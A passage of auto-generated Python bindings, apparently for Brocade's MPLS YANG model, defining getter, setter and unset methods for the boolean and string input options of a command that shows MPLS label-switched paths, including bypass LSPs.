if hasattr(self, '_set'):
self._set()
def _unset_bypass_lsp_dynamic_extensive(self):
self.__bypass_lsp_dynamic_extensive = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-dynamic-extensive", rest_name="bypass-lsp-dynamic-extensive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
def _get_bypass_lsp_dynamic_debug(self):
"""
Getter method for bypass_lsp_dynamic_debug, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_dynamic_debug (boolean)
YANG Description: Show all dynamic bypass-lsps in extensive debug
"""
return self.__bypass_lsp_dynamic_debug
def _set_bypass_lsp_dynamic_debug(self, v, load=False):
"""
Setter method for bypass_lsp_dynamic_debug, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_dynamic_debug (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_bypass_lsp_dynamic_debug is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_bypass_lsp_dynamic_debug() directly.
YANG Description: Show all dynamic bypass-lsps in extensive debug
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="bypass-lsp-dynamic-debug", rest_name="bypass-lsp-dynamic-debug", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """bypass_lsp_dynamic_debug must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-dynamic-debug", rest_name="bypass-lsp-dynamic-debug", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)""",
})
self.__bypass_lsp_dynamic_debug = t
if hasattr(self, '_set'):
self._set()
def _unset_bypass_lsp_dynamic_debug(self):
self.__bypass_lsp_dynamic_debug = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-dynamic-debug", rest_name="bypass-lsp-dynamic-debug", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
def _get_bypass_lsp_dynamic_name(self):
"""
Getter method for bypass_lsp_dynamic_name, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_dynamic_name (string)
YANG Description: Show one dynamic bypass-lsp detailed info by name
"""
return self.__bypass_lsp_dynamic_name
def _set_bypass_lsp_dynamic_name(self, v, load=False):
"""
Setter method for bypass_lsp_dynamic_name, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_dynamic_name (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_bypass_lsp_dynamic_name is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_bypass_lsp_dynamic_name() directly.
YANG Description: Show one dynamic bypass-lsp detailed info by name
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="bypass-lsp-dynamic-name", rest_name="bypass-lsp-dynamic-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """bypass_lsp_dynamic_name must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="bypass-lsp-dynamic-name", rest_name="bypass-lsp-dynamic-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)""",
})
self.__bypass_lsp_dynamic_name = t
if hasattr(self, '_set'):
self._set()
def _unset_bypass_lsp_dynamic_name(self):
self.__bypass_lsp_dynamic_name = YANGDynClass(base=unicode, is_leaf=True, yang_name="bypass-lsp-dynamic-name", rest_name="bypass-lsp-dynamic-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
def _get_bypass_lsp_dynamic_name_extensive(self):
"""
Getter method for bypass_lsp_dynamic_name_extensive, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_dynamic_name_extensive (boolean)
YANG Description: Show one dynamic bypass-lsp extensive info by name
"""
return self.__bypass_lsp_dynamic_name_extensive
def _set_bypass_lsp_dynamic_name_extensive(self, v, load=False):
"""
Setter method for bypass_lsp_dynamic_name_extensive, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_dynamic_name_extensive (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_bypass_lsp_dynamic_name_extensive is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_bypass_lsp_dynamic_name_extensive() directly.
YANG Description: Show one dynamic bypass-lsp extensive info by name
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="bypass-lsp-dynamic-name-extensive", rest_name="bypass-lsp-dynamic-name-extensive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """bypass_lsp_dynamic_name_extensive must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-dynamic-name-extensive", rest_name="bypass-lsp-dynamic-name-extensive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)""",
})
self.__bypass_lsp_dynamic_name_extensive = t
if hasattr(self, '_set'):
self._set()
def _unset_bypass_lsp_dynamic_name_extensive(self):
self.__bypass_lsp_dynamic_name_extensive = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-dynamic-name-extensive", rest_name="bypass-lsp-dynamic-name-extensive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
def _get_bypass_lsp_dynamic_name_debug(self):
"""
Getter method for bypass_lsp_dynamic_name_debug, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_dynamic_name_debug (boolean)
YANG Description: Show one dynamic bypass-lsp extensive debug info by name
"""
return self.__bypass_lsp_dynamic_name_debug
def _set_bypass_lsp_dynamic_name_debug(self, v, load=False):
"""
Setter method for bypass_lsp_dynamic_name_debug, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_dynamic_name_debug (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_bypass_lsp_dynamic_name_debug is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_bypass_lsp_dynamic_name_debug() directly.
YANG Description: Show one dynamic bypass-lsp extensive debug info by name
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="bypass-lsp-dynamic-name-debug", rest_name="bypass-lsp-dynamic-name-debug", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """bypass_lsp_dynamic_name_debug must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-dynamic-name-debug", rest_name="bypass-lsp-dynamic-name-debug", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)""",
})
self.__bypass_lsp_dynamic_name_debug = t
if hasattr(self, '_set'):
self._set()
def _unset_bypass_lsp_dynamic_name_debug(self):
self.__bypass_lsp_dynamic_name_debug = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-dynamic-name-debug", rest_name="bypass-lsp-dynamic-name-debug", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
def _get_lsp_input_lsp_name(self):
"""
Getter method for lsp_input_lsp_name, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/lsp_input_lsp_name (string)
YANG Description: Lsp name for show lsp command
"""
return self.__lsp_input_lsp_name
def _set_lsp_input_lsp_name(self, v, load=False):
"""
Setter method for lsp_input_lsp_name, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/lsp_input_lsp_name (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_lsp_input_lsp_name is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_lsp_input_lsp_name() directly.
YANG Description: Lsp name for show lsp command
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="lsp-input-lsp-name", rest_name="lsp-input-lsp-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_input_lsp_name must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="lsp-input-lsp-name", rest_name="lsp-input-lsp-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)""",
})
self.__lsp_input_lsp_name = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_input_lsp_name(self):
self.__lsp_input_lsp_name = YANGDynClass(base=unicode, is_leaf=True, yang_name="lsp-input-lsp-name", rest_name="lsp-input-lsp-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
def _get_lsp_input_bypass(self):
"""
Getter method for lsp_input_bypass, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/lsp_input_bypass (boolean)
YANG Description: Lsp type is bypass show lsp command
"""
return self.__lsp_input_bypass
def _set_lsp_input_bypass(self, v, load=False):
"""
Setter method for lsp_input_bypass, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/lsp_input_bypass (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_lsp_input_bypass is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_lsp_input_bypass() directly.
YANG Description: Lsp type is bypass show lsp command
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="lsp-input-bypass", rest_name="lsp-input-bypass", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_input_bypass must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-input-bypass", rest_name="lsp-input-bypass", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)""",
})
self.__lsp_input_bypass = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_input_bypass(self):
self.__lsp_input_bypass = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-input-bypass", rest_name="lsp-input-bypass", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
def _get_lsp_input_dynamic(self):
"""
Getter method for lsp_input_dynamic, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/lsp_input_dynamic (boolean)
YANG Description: Lsp type is dynamically created show lsp command
"""
return self.__lsp_input_dynamic
def _set_lsp_input_dynamic(self, v, load=False):
"""
Setter method for lsp_input_dynamic, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/lsp_input_dynamic (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_lsp_input_dynamic is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_lsp_input_dynamic() directly.
YANG Description: Lsp type is dynamically created show lsp command
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="lsp-input-dynamic", rest_name="lsp-input-dynamic", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_input_dynamic must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-input-dynamic", rest_name="lsp-input-dynamic", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)""",
})
self.__lsp_input_dynamic = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_input_dynamic(self):
self.__lsp_input_dynamic = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-input-dynamic", rest_name="lsp-input-dynamic", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
def _get_lsp_input_brief(self):
"""
Getter method for lsp_input_brief, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/lsp_input_brief (boolean)
YANG Description: Lsp show type is brief
"""
return self.__lsp_input_brief
def _set_lsp_input_brief(self, v, load=False):
"""
Setter method for lsp_input_brief, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/lsp_input_brief (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_lsp_input_brief is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_lsp_input_brief() directly.
YANG Description: Lsp show type is brief
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="lsp-input-brief", rest_name="lsp-input-brief", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_input_brief must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-input-brief", rest_name="lsp-input-brief", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)""",
})
self.__lsp_input_brief = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_input_brief(self):
self.__lsp_input_brief = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-input-brief", rest_name="lsp-input-brief", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
def _get_lsp_input_wide(self):
"""
Getter method for lsp_input_wide, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/lsp_input_wide (boolean)
YANG Description: Lsp show type is brief and wide
"""
return self.__lsp_input_wide
def _set_lsp_input_wide(self, v, load=False):
"""
Setter method for lsp_input_wide, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/lsp_input_wide (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_lsp_input_wide is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_lsp_input_wide() directly.
YANG Description: Lsp show type is brief and wide
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="lsp-input-wide", rest_name="lsp-input-wide", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_input_wide must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-input-wide", rest_name="lsp-input-wide", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)""",
})
self.__lsp_input_wide = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_input_wide(self):
self.__lsp_input_wide = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-input-wide", rest_name="lsp-input-wide", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
def _get_lsp_input_detail(self):
"""
Getter method for lsp_input_detail, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/lsp_input_detail (boolean)
YANG Description: Lsp show type is detail
"""
return self.__lsp_input_detail
def _set_lsp_input_detail(self, v, load=False):
"""
Setter method for lsp_input_detail, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/lsp_input_detail (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_lsp_input_detail is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_lsp_input_detail() directly.
YANG Description: Lsp show type is detail
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="lsp-input-detail", rest_name="lsp-input-detail", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_input_detail must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-input-detail", rest_name="lsp-input-detail", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)""",
})
self.__lsp_input_detail = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_input_detail(self):
self.__lsp_input_detail = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-input-detail", rest_name="lsp-input-detail", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
def _get_lsp_input_extensive(self):
"""
Getter method for lsp_input_extensive, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/lsp_input_extensive (boolean)
YANG Description: Lsp show type is extensive
"""
return self.__lsp_input_extensive
def _set_lsp_input_extensive(self, v, load=False):
"""
Setter method for lsp_input_extensive, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/lsp_input_extensive (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_lsp_input_extensive is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_lsp_input_extensive() directly.
YANG Description: Lsp show type is extensive
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="lsp-input-extensive", rest_name="lsp-input-extensive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_input_extensive must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-input-extensive", rest_name="lsp-input-extensive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)""",
})
self.__lsp_input_extensive = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_input_extensive(self):
self.__lsp_input_extensive = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-input-extensive", rest_name="lsp-input-extensive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
def _get_lsp_input_debug(self):
"""
Getter method for lsp_input_debug, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/lsp_input_debug (boolean)
YANG Description: Lsp show type is debug
"""
return self.__lsp_input_debug
def _set_lsp_input_debug(self, v, load=False):
"""
Setter method for lsp_input_debug, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/lsp_input_debug (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_lsp_input_debug is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_lsp_input_debug() directly.
YANG Description: Lsp show type is debug
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="lsp-input-debug", rest_name="lsp-input-debug", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_input_debug must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-input-debug", rest_name="lsp-input-debug", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)""",
})
self.__lsp_input_debug = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_input_debug(self):
self.__lsp_input_debug = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-input-debug", rest_name="lsp-input-debug", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
def _get_lsp_input_one(self):
"""
Getter method for lsp_input_one, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/lsp_input_one (boolean)
YANG Description: One Lsp show
"""
return self.__lsp_input_one
def _set_lsp_input_one(self, v, load=False):
"""
Setter method for lsp_input_one, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/lsp_input_one (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_lsp_input_one is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_lsp_input_one() directly.
YANG Description: One Lsp show
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="lsp-input-one", rest_name="lsp-input-one", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_input_one must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-input-one", rest_name="lsp-input-one", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)""",
})
self.__lsp_input_one = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_input_one(self):
self.__lsp_input_one = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-input-one", rest_name="lsp-input-one", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
def _get_lsp_input_all(self):
"""
Getter method for lsp_input_all, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/lsp_input_all (boolean)
YANG Description: All Lsp show
"""
return self.__lsp_input_all
def _set_lsp_input_all(self, v, load=False):
"""
Setter method for lsp_input_all, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/lsp_input_all (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_lsp_input_all is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_lsp_input_all() directly.
YANG Description: All Lsp show
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="lsp-input-all", rest_name="lsp-input-all", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_input_all must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-input-all", rest_name="lsp-input-all", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)""",
})
self.__lsp_input_all = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_input_all(self):
self.__lsp_input_all = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-input-all", rest_name="lsp-input-all", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
def _get_lsp_input_more(self):
"""
Getter method for lsp_input_more, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/lsp_input_more (boolean)
YANG Description: More Lsps to show
"""
return self.__lsp_input_more
def _set_lsp_input_more(self, v, load=False):
"""
Setter method for lsp_input_more, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/lsp_input_more (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_lsp_input_more is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_lsp_input_more() directly.
YANG Description: More Lsps to show
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="lsp-input-more", rest_name="lsp-input-more", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_input_more must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-input-more", rest_name="lsp-input-more", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)""",
})
self.__lsp_input_more = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_input_more(self):
self.__lsp_input_more = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-input-more", rest_name="lsp-input-more", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
lsp = __builtin__.property(_get_lsp, _set_lsp)
lsp_wide = __builtin__.property(_get_lsp_wide, _set_lsp_wide)
lsp_detail = __builtin__.property(_get_lsp_detail, _set_lsp_detail)
